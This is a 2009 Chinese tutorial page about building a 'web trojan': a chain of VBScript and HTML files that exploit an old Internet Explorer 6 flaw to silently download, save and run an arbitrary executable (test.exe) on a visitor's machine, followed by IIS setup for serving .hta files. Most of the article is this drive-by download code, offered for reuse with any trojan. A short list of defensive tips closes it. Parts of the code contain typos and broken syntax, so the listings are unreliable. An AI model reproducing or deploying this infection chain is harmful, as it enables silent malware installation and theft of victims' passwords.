网站首页  注册会员  本站免费电影 留言板  繁體中文

 

您现在的位置: 陈鹏个人网站 >> 电脑应用 >> 网络应用 >> 网络安全 >> 正文
 

   
专 题 栏 目
相 关 文 章

5.19断网事件详解:少年租
QQ邮箱功能详解之一邮多
深入了解:腾讯回收QQ号
详解手机QQ在诺基亚中的
高手见解:探讨升级的九
详解各种QQ病毒特征及清
精解:传说中五子棋的五
详解:QQ在线时间“活跃天
BT入门——傻瓜详解版
详解CSS优先级规则的级别

 
详解:菜鸟学习网页木马制作           
详解:菜鸟学习网页木马制作
作者:陈鹏 文章来源:eNet 点击数: 更新时间:2009-9-11 23:11:26
 




 

以前写了一篇文章,讲了关于怎样用最简单的方法获取对方的管理权限,里面用到了网页木马,最近有许多网友问我怎样制作网页木马,就这个问题我发表篇比较简单易懂的文章,希望大家珍惜我的劳动成果。

  我们经常听到这样的忠告:“不要随意下在不明的程序,不要随意打开邮件的附件...”这样的忠告确实是有用的,不过我们的系统有不少漏洞,许多木马已经不需要客户端和服务端了,他们利用这些系统漏洞按照被系统认为合法的代码执行木马的功能,有的木马会在你完全不知道的情况下潜入,现在我来讲解下通过IE6的漏洞实现访问网页后神不知鬼不觉的下在并执行指定程序的例子,也就是网页木马.

  

  首先我们需要编写几个简单的文件

  

  一。名字为abc.abc的文件

  

  

  <html>

  <script language="vbscript">

  Function HttpDoGet(url)

   set oReq = CreateObject("Microsoft.XMLHTTP")

   oReq.open "GET",url,false

   oReq.send

   If oReq.status=200 then

   HttpDoGet=oReq.respomseBody

   Savefile HttpDoGet,"c:\win.exe"

   End If

   Set oReq=nothing

  End Function

  sub SaveFile(str.fName)

   Set objStream = CreateObject("ADODB.Stream")

   objStream.Type =1

   objStream.Open

   objStream.write str

   objStream.SaveToFile fName.2

   objStream.Close()

   set objStream = nothing

   exewin()

  End sub

  Sub exewin()

   set wshshell=createobject ("wscript.shell" )

   a=wshshell.run ("cmd.exe /c c:\win.exe",0)

   b=wshshell.run ("cmd.exe /c del c:\win.hta",0)

   window.close

  End Sub

  HttpDoGet "http://127.0.0.1/test.exe"

  </script>

  </html>

  

  其中test.exe为木马程序,实现必须放在WEB发布的目录下,文件abc.abc也必须保存在发布的目录下。

  
  

热门推荐: 盗QQ的密码软件模拟实现技术 网络知识之P2P技术全攻略



  

  二。名字为test.htm的文件

  

  <html><body>

  木马运行测试!(这句话可以改成你想说的)

  <object date="http://127.0.0.1/win.test";;;></object>

  </body></html>

  

  三。名字为win.test的文件

  

  

  <html>

  <body>

  <script language="vbscript">

  Function HttpDoGet(url)

   set oReq = CreateObject("Microsoft.XMLHTTP")

   oReq.open "GET",url,false

   oReq.send

   If oReq.status=200 then

   HttpDoGet,"c:\win.hta"

   Set oReq=nothing

   End if

  end function

  sub SaveFile(str,fName)

   Dim fso, tf

   S e t f s o = C r e a t e O b j e c t(Scripting.FileSystemObject")

   Set tf = fso.CreateTextfile(fName,True)

   tf.Write str

   tf.Close

   exewin()

  End sub

  Sub exewin()

   set wshshell=createobject ("wscript.shell" )

   a=wshshell.run ("cmd.exe /c c:\win.hat",0)

   window.close

  End Sub

  HttpDoGet("http://127.0.0.1/abc.abc")

  </script>

  </body>

  </html>

  
  
热门推荐: 盗QQ的密码软件模拟实现技术 网络知识之P2P技术全攻略



  

  四。名字为test.exe的木马程序。

  

  晕...这个就不用我提供了吧,你想用什么木马就把他的名字换成test.exe传上去就可以了。

  

  服务器的文件列表

  test.htm:对外发布的网页

  win.test:下在文件abc.abc到对方机器上,并且保存为win.hta并且执行。

  abc.abc下载二进制的木马文件test.exe,并执行。

  test.exe:木马程序。

  

  上面所说的文件可以修改成任意名字,只是不要忘记把源码里的文件指向也修改就可以了!

  

  最后是设置IIS,打开“程序→管理工具→internet服务管理器”,右键单击要设置的站点,选择《属性》,在选择“http头”。单击“MIME映射”里的“文件类型”按钮,并在关联扩展名文本框中输入“.hta”,在内容类型(MIME)中输入“application/hta",然后关闭所有窗口就可以了。

  

  有许多朋友多遇见过,说什么赠送Q号或者玩网游的时候里面有人喊赠送好东东在XXX网址,其实那上面所说的例子用的就是这种原理,不知不觉中你机器上的所有有关于密码或者指定名词的东西全发送到对方指定的邮件箱里去了

  

  看完后是否觉得这种木马太危险,甚至有种想把网线拔掉的感觉那?呵呵,其实了解了网页木马的工作原理后我们就不难防护他,看完以上内容后就可以得出一个结论,网页木马主要利用IE的漏洞来实现的,所以在预防的时候一定要做到以下几点就可以保证上网的安全了,

  A。安装IE的最新版本并且随时下在才做系统和IE的补丁程序。

  B。不随便登陆不熟悉朋友送来的网站,对于熟悉的朋友也要小心哦。

  C。不随便登陆黑客网站(^_^黑基除外了啦,我担保的...),色情网站,尤其一些卖外挂,卖木马的网站。

  D。不随便打开和预览有附件的邮件。

  E。安装防火墙和杀毒软件的最新版本,经常进行升级和查毒。

  
热门推荐: 盗QQ的密码软件模拟实现技术 网络知识之P2P技术全攻略


【责任编辑:李旭海】

文章录入:陈鹏    责任编辑:陈鹏 
  • 上一篇文章:

  • 下一篇文章:
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
     
     
     
     
     

    Copyright © 2007 - 2009 chenpeng123.com All Rights Reserved
    本站所有文章,软件等均来自网络收集,不代表本站观点,仅供学习和研究使用。如有侵犯您的版权,请联系我们,本站将立即删除。
    鲁ICP备07014697号
    你是本站第 位访客